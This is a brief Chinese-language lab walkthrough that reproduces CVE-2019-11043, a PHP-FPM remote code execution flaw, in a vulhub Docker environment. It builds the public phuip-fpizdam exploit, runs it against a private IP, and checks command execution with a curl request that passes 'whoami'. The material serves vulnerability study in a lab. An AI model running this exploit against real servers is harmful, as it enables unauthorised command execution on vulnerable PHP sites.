环境搭建
启动docker
systemctl start docker
获取vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
进入对应目录
cd vulhub/php/CVE-2019-11043/
启动容器
docker-compose up -d
查看容器
docker ps
访问http://127.0.0.1:8080/
安装go环境
apt-get install golang -y
下载exp
git clone --depth=1 https://hub.fastgit.org/neex/phuip-fpizdam.git
生成exp
cd phuip-fpizdam
go build
因为国内无法访问golang.org
所以需要想办法下载
漏洞复现
./phuip-fpizdam http://192.168.164.158:8080/index.php
curl http://192.168.164.158:8080/index.php?a=whoami
参考文章
https://vulhub.org/#/environments/php/CVE-2019-11043/
https://www.runoob.com/go/go-environment.html
https://github.com/neex/phuip-fpizdam